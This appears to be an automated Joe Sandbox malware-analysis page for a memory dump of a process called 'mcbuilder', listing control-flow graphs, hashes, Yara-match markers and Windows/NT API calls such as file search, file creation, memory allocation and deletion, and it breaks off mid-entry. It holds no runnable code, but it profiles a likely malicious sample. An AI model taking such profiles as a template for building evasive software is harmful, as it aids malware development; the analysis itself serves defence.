                                                control_flow_graph 110 3099b20-3099e28 111 3099e39-3099e45 110->111 112 3099e58-3099e68 111->112 113 3099e47-3099e56 111->113 112->112 115 3099e6a 112->115 113->111 116 3099e71-3099e7b 115->116 117 3099e7d-3099e89 116->117 118 3099eb6-3099ec7 116->118 120 3099e8b-3099e8f 117->120 121 3099e90-3099e92 117->121 119 3099ed8-3099ee1 118->119 124 3099ef1-3099f02 119->124 125 3099ee3-3099eef 119->125 120->121 122 3099ea5-3099eae 121->122 123 3099e94-3099ea3 121->123 126 3099eb4 122->126 123->126 127 3099f13-3099f1f 124->127 125->119 126->116 129 3099f21-3099f33 127->129 130 3099f35-3099f3e 127->130 129->127 131 309a148-309a14f 130->131 132 3099f44-3099f4e 130->132 134 309a151-309a15b 131->134 135 309a1c5-309a1cf 131->135 136 3099f5f-3099f68 132->136 139 309a16c-309a175 134->139 137 3099f6a-3099f7c 136->137 138 3099f7e-3099f91 136->138 137->136 143 3099fa2-3099fae 138->143 141 309a18b call 30ba9c0 139->141 142 309a177-309a189 139->142 149 309a190-309a19a 141->149 145 309a15d-309a166 142->145 146 3099fc1-3099fcb 143->146 147 3099fb0-3099fbf 143->147 145->139 150 3099fdc-3099fe8 146->150 147->143 151 309a1ab-309a1b4 149->151 152 3099ff9-309a000 150->152 153 3099fea-3099ff7 150->153 151->135 154 309a1b6-309a1c3 151->154 156 309a021-309a030 152->156 157 309a002-309a01f 152->157 153->150 154->151 159 309a068-309a06f 156->159 160 309a032-309a03c 156->160 157->152 161 309a071-309a094 159->161 162 309a096-309a09d 159->162 163 309a04d-309a056 160->163 161->159 164 309a09f-309a0cc 162->164 165 309a0ce-309a0d8 162->165 166 309a058-309a061 163->166 167 309a063 163->167 164->162 169 309a0e9-309a0f2 165->169 166->163 167->131 170 309a108-309a10e 169->170 171 309a0f4-309a106 169->171 173 309a112-309a11e 170->173 171->169 174 309a120-309a141 173->174 175 309a143 173->175 174->173 175->130
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $v$&!$*-$2M$9h$=C$>M$G$J$NA$P~$R~$Ud$V$[*$[/$`$ht$oA$x$z$}$~*
                                                • API String ID: 0-2677354048
                                                • Opcode ID: 33a711aff24154eedd4bc35af0b9e32e56be7adcf51d6de459c951a7d642e33a
                                                • Instruction ID: fa1c964425a17240d214f693b37f628da05d3a9bfece2178217cbd08d724ef2c
                                                • Opcode Fuzzy Hash: 33a711aff24154eedd4bc35af0b9e32e56be7adcf51d6de459c951a7d642e33a
                                                • Instruction Fuzzy Hash: 9B029AB0D06628CBEF24CF84C998BDDBBB1BB45308F1085CAD1097B281D7B95A89DF55
                                                Function 030A1B70 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 452COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 695 30a1b70-30a1b87 696 30a1b91-30a1bb1 call 30b1a50 695->696 697 30a1b8c call 3091410 695->697 700 30a1bba-30a1be8 call 30bae00 call 30b0f30 696->700 701 30a1bb3-30a1bb8 SetErrorMode 696->701 697->696 706 30a1bee-30a1c18 call 30ba6b0 call 30b0f60 700->706 707 30a2120-30a2125 700->707 701->700 706->707 712 30a1c1e-30a1c79 call 30bae00 call 30badb0 706->712 717 30a1c7b-30a1c80 712->717 718 30a1c82 712->718 719 30a1c84-30a1cb7 717->719 718->719 720 30a1cbd 719->720 721 30a1d94-30a1e2e call 30b77b0 call 30a3780 call 30bbe60 call 30ba2f0 call 30bbf90 call 30ba2b0 719->721 723 30a1cc0-30a1cc6 720->723 756 30a1e8b-30a1ecb call 30bae00 call 30b4e50 721->756 757 30a1e30-30a1e86 call 30bae00 call 30bad80 call 30b4580 721->757 724 30a1cc8-30a1ccb 723->724 725 30a1cd2-30a1cf3 call 30badb0 723->725 724->723 727 30a1ccd 724->727 733 30a1cff 725->733 734 30a1cf5-30a1cfd 725->734 727->721 735 30a1d02-30a1d18 733->735 734->735 737 30a1d1a-30a1d1d 735->737 738 30a1d2e-30a1d6d call 30a3780 call 30badb0 735->738 740 30a1d20-30a1d23 737->740 752 30a1d6f-30a1d74 738->752 753 30a1d76 738->753 744 30a1d2c 740->744 745 30a1d25-30a1d28 740->745 744->738 745->740 748 30a1d2a 745->748 748->738 755 30a1d78-30a1d91 call 30a1770 752->755 753->755 755->721 768 30a1ed1-30a1ed6 756->768 769 30a2004 756->769 773 30a2007-30a2008 757->773 768->769 771 30a1edc-30a1f0b call 30a3e10 call 30b5fa0 768->771 769->773 771->769 784 30a1f11-30a1f21 call 30a05a0 771->784 775 30a2010-30a2026 call 30b5fa0 773->775 781 30a202c-30a203f call 30a05a0 775->781 782 30a20e6-30a20fb call 30a7f50 775->782 792 30a2040-30a208b call 30badb0 call 30bb3c0 call 30914a0 call 30b19f0 781->792 789 30a210c-30a2110 782->789 790 30a20fd-30a2109 call 30b5170 782->790 795 30a1f24-30a1f2a 784->795 789->775 794 30a2116 789->794 790->789 816 30a20b8-30a20bc 792->816 817 30a208d-30a20b5 call 30b4f90 792->817 794->707 798 30a1f2c-30a1f56 call 30b4f90 795->798 799 30a1f66-30a1f7b call 30a05e0 795->799 806 30a1f5b-30a1f64 798->806 799->795 807 30a1f7d-30a1f90 call 30a0670 799->807 806->799 806->807 807->769 814 30a1f92-30a1f96 807->814 814->769 815 30a1f98-30a1fb3 call 30a7f50 814->815 826 30a1fc4-30a1fca 815->826 827 30a1fb5-30a1fbc call 30b5170 815->827 820 30a20d9-30a20e3 call 30a0670 816->820 821 30a20be-30a20d3 call 30a05e0 816->821 817->816 820->782 821->792 821->820 831 30a1ffb-30a2002 826->831 832 30a1fcc-30a1fd3 826->832 833 30a1fc1 827->833 831->769 831->814 834 30a1ff3-30a1ff5 832->834 835 30a1fd5-30a1fea call 30a7f50 832->835 833->826 834->831 835->834 838 30a1fec 835->838 838->834
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,?,?,030B4F6E,030A1B53), ref: 030A1BB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID: pBy$F
                                                • API String ID: 2340568224-845662772
                                                • Opcode ID: aefb0a52804cd24e01667cfc866b54672f56c1f8bfc09f4977e0b6c6423fdd24
                                                • Instruction ID: 08684419a725dcf8747d4020b3865d520258a994c3be89de3ef143bb62fd9656
                                                • Opcode Fuzzy Hash: aefb0a52804cd24e01667cfc866b54672f56c1f8bfc09f4977e0b6c6423fdd24
                                                • Instruction Fuzzy Hash: 13F193B5D01718ABDB24DFA4DC81FEEB7BDAF84304F04859AE509A6141E7706B48CFA1
                                                Function 030AC410 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 030AC4F4
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 030AC52F
                                                • FindClose.KERNELBASE(?), ref: 030AC53A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: 8220799a318cf72d7f1976648d233f155df50d4904d92ac36e635e4cc54ac0e3
                                                • Instruction ID: 963e761337152942741a7dafb2b88ed091df197025bbf366aa52ad65cae46253
                                                • Opcode Fuzzy Hash: 8220799a318cf72d7f1976648d233f155df50d4904d92ac36e635e4cc54ac0e3
                                                • Instruction Fuzzy Hash: 45319275A01748BBEB24DFA4DC85FFF77BC9F84744F144458F909AB180DA70AA858BA0
                                                Function 030B8980 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(?,CC7E5000,?,?,?,?,?,?,?,?,?), ref: 030B8A7B
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 067dcf8ebb783fc9675187bededa98280aa01a3b00d029a7a3deeda5e6b87881
                                                • Instruction ID: 407eb3f5ae879f8954c81cc8e272a65ce5552b1e0df7831982973e8f87f0ad2a
                                                • Opcode Fuzzy Hash: 067dcf8ebb783fc9675187bededa98280aa01a3b00d029a7a3deeda5e6b87881
                                                • Instruction Fuzzy Hash: F331C1B5A01248AFDB54DF98D880EEEB7F9EF8C304F508209F919A7240D770A951CBA5
                                                Function 030B8AF0 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,CC7E5000,?,?,?,?,?,?,?), ref: 030B8BD3
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0a481d665e1630ad9e856e9ba73f7822fcb8cfe26c6d278b01e407281e883816
                                                • Instruction ID: 6f10b38074dce21d5cf09a18db41ca1081ad720a009cbf212a67744fe9943ca5
                                                • Opcode Fuzzy Hash: 0a481d665e1630ad9e856e9ba73f7822fcb8cfe26c6d278b01e407281e883816
                                                • Instruction Fuzzy Hash: 4B31E8B5A01208AFDB14DF98D880EEFB7F9EF88314F108209F919A7240D770A911CBA1
                                                Function 030B8DF0 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(030A1C13,CC7E5000,030B78AF,00000000,00000004,00003000,?,?,?,?,?,030B78AF,030A1C13,030BAD01,030B78AF,6AAC5589), ref: 030B8EB5
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: 1cc47cabd94037132196a0a443f07475a3b65fbe5146999252dba1adc8f4e692
                                                • Instruction ID: 5b5ba9ee287311ed4f2cd0d8c01fcbd50ff2a01f5ffa0b52c16496ac037d5e2a
                                                • Opcode Fuzzy Hash: 1cc47cabd94037132196a0a443f07475a3b65fbe5146999252dba1adc8f4e692
                                                • Instruction Fuzzy Hash: 26210AB5A01249AFDB14DF98DC41EEF77B9EF88704F004209F919AB244D774A911CBA1
                                                Function 030B8BE0 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 4f23b8e2131235d9aa7fea977af7136a21e554f3965beb0d504205d9eac58c8d
                                                • Instruction ID: 43bc508e9eab3cf90e042b1c529b729938e0c11eecb41a3622d0b43bf32bff19
                                                • Opcode Fuzzy Hash: 4f23b8e2131235d9aa7fea977af7136a21e554f3965beb0d504205d9eac58c8d
                                                • Instruction Fuzzy Hash: 99115E75A01245BEE620EAA8CC41FEB73ACEFC5714F50460AFA19AA280DB707905C7E5
                                                Function 030B8C80 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 030B8CB4
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3491890393.0000000003090000.00000040.80000000.00040000.00000000.sdmp, Offset: 03090000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3090000_mcbuilder.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                                                • Instruction ID: 68d58aeeb9e4dc6a45bb94db00f30b6d444d2650beda7d109e91a41bdd97712f
                                                • Opcode Fuzzy Hash: 5bbb66dc0cd2e4fa1e542e3d13877265f0de1094121c625da3f843a8cf084873
                                                • Instruction Fuzzy Hash: D7E0463A210204BBE620FB69CC40FDB77ACDFC5724F008416FA1CAB241C670B90586E5
                                                Function 038D4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: e6c7269c0f7fac60c9691fb40f0c2212b8c13bf73c9d4d8258bb7d25b5135ac0
                                                • Instruction ID: e61e6d16fbadc55011bb5715fc83a6be9c28cc3691d156ef5690d04c13110f1e
                                                • Opcode Fuzzy Hash: e6c7269c0f7fac60c9691fb40f0c2212b8c13bf73c9d4d8258bb7d25b5135ac0
                                                • Instruction Fuzzy Hash: B6900231605804269140B198488454A400597E1701B65C051E1428554C8B148A5A5362
                                                Function 038D4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 81f2d12d008a69f0548a569668446a33530cac8df71882dec2d07c836491b950
                                                • Instruction ID: 3fab746a6ae9b0a8eeced934c71ae126d721565f06fb3c095936f1aa7d9895f3
                                                • Opcode Fuzzy Hash: 81f2d12d008a69f0548a569668446a33530cac8df71882dec2d07c836491b950
                                                • Instruction Fuzzy Hash: 73900261601504564140B198480440A600597E27013A5C155A1558560C87188959926A
                                                Function 038D2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9a11378d4e2e7502eb174b54ce65b24a5c5165cdc1f13311eb53d97a4051431d
                                                • Instruction ID: 86a4570279a72353317baa0a892c33aa9a9c6e00a3113082fc951fb34de5bc71
                                                • Opcode Fuzzy Hash: 9a11378d4e2e7502eb174b54ce65b24a5c5165cdc1f13311eb53d97a4051431d
                                                • Instruction Fuzzy Hash: 7990023160540C16D150B198441474A000587D1701F65C051A1028654D87558B5976A2
                                                Function 038D2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a7a62257dc9d64c53dc30b4002ea16112281dfcbd76acdecd40ee9278d1d1158
                                                • Instruction ID: fb932ce2b8a68e468951ffc187cdebae3820f52262aeee178d873c6a90d22817
                                                • Opcode Fuzzy Hash: a7a62257dc9d64c53dc30b4002ea16112281dfcbd76acdecd40ee9278d1d1158
                                                • Instruction Fuzzy Hash: BE90023120544C56D140B1984404A4A001587D1705F65C051A1068694D97258E59B662
                                                Function 038D2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 8dbddcc0414678144a36d812f2c6b1a754a679d8cb260f9583bb7b03ad41b592
                                                • Instruction ID: 86a592fb0558a2b450f5e3e32fd42bf7f018097df436f05cbecb4715078a07fd
                                                • Opcode Fuzzy Hash: 8dbddcc0414678144a36d812f2c6b1a754a679d8cb260f9583bb7b03ad41b592
                                                • Instruction Fuzzy Hash: 6D90023120140C16D180B198440464E000587D2701FA5C055A1029654DCB158B5D77A2
                                                Function 038D2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 7bf25214da855ff70ce45c024fde1be0db8fd6c9664490c25e4ba6bd30bfaf69
                                                • Instruction ID: b2dde39a0f4bbaf741d7f5e449a6c88e88b7265c596e971b85a8860654c4c69d
                                                • Opcode Fuzzy Hash: 7bf25214da855ff70ce45c024fde1be0db8fd6c9664490c25e4ba6bd30bfaf69
                                                • Instruction Fuzzy Hash: CD900261202404174105B198441461A400A87E1601B65C061E2018590DC62589956126
                                                Function 038D2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ece2a4c36bc3642765c443b473de38b79623de5812af5f8fa054a1b159522c4e
                                                • Instruction ID: d15434150dee4510fdd565f05d23c6e36beb20ab88625a1ede054c4b03a1199d
                                                • Opcode Fuzzy Hash: ece2a4c36bc3642765c443b473de38b79623de5812af5f8fa054a1b159522c4e
                                                • Instruction Fuzzy Hash: 4C900225211404170105F598070450B004687D6751365C061F2019550CD72189655122
                                                Function 038D2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f6c898ea7319fbcd3f69e4d195c4a80ab940349d981439625a7b0905354205e9
                                                • Instruction ID: f3e91e96adc52e1a21f1394d30f3a5e3aad96ad4f0df9acb38cf3a0e98eea99d
                                                • Opcode Fuzzy Hash: f6c898ea7319fbcd3f69e4d195c4a80ab940349d981439625a7b0905354205e9
                                                • Instruction Fuzzy Hash: C4900225221404160145F598060450F044597D77513A5C055F241A590CC72189695322
                                                Function 038D2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 736757fd77b925f39d9e1b05ae73b3d27b65338b75a6ff71dc44f8ff911a31f5
                                                • Instruction ID: a3b4e65640a4637874450986802e20c5a80250d8fcb33f8d659ee5892a83b027
                                                • Opcode Fuzzy Hash: 736757fd77b925f39d9e1b05ae73b3d27b65338b75a6ff71dc44f8ff911a31f5
                                                • Instruction Fuzzy Hash: E1900221601404564140B1A8884490A4005ABE2611765C161A199C550D865989695666
                                                Function 038D2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: c6d357f79f892504a1d1fd6bd110a41867e1788f8754bbe566d06a008110d84c
                                                • Instruction ID: b5954394e255da94d3daedf2d108b4383195632ae441ac251c76b298d546f81f
                                                • Opcode Fuzzy Hash: c6d357f79f892504a1d1fd6bd110a41867e1788f8754bbe566d06a008110d84c
                                                • Instruction Fuzzy Hash: BA900221211C0456D200B5A84C14B0B000587D1703F65C155A1158554CCA1589655522
                                                Function 038D2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 50bff3379c58b6c5c1c2a287a69fdc780c1d51b472dd54e24d789a955093ba21
                                                • Instruction ID: 960b097e6d2e01b361ded0d9fae3d48f190475c5a6f6613081eb8344a5d8008b
                                                • Opcode Fuzzy Hash: 50bff3379c58b6c5c1c2a287a69fdc780c1d51b472dd54e24d789a955093ba21
                                                • Instruction Fuzzy Hash: 2590026134140856D100B1984414B0A0005C7E2701F65C055E2068554D8719CD566127
                                                Function 038D2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 013227927f7986aa8628bf928cfd1873bd4aee65a2c1a2533d5514eace0d7da2
                                                • Instruction ID: 6eae8658a672c4c0e41163e3df7f1e4f6759a6fe181b3ee4b836631221ba9dba
                                                • Opcode Fuzzy Hash: 013227927f7986aa8628bf928cfd1873bd4aee65a2c1a2533d5514eace0d7da2
                                                • Instruction Fuzzy Hash: 1F90022160140916D101B198440461A000A87D1641FA5C062A2028555ECB258A96A132
                                                Function 038D2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.3493133569.0000000003860000.00000040.00001000.00020000.00000000.sdmp, Offset: 03860000, based on PE: true
                                                • Associated: 00000008.00000002.3493133569.0000000003989000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.000000000398D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.3493133569.00000000039FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_3860000_mcbuilder.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
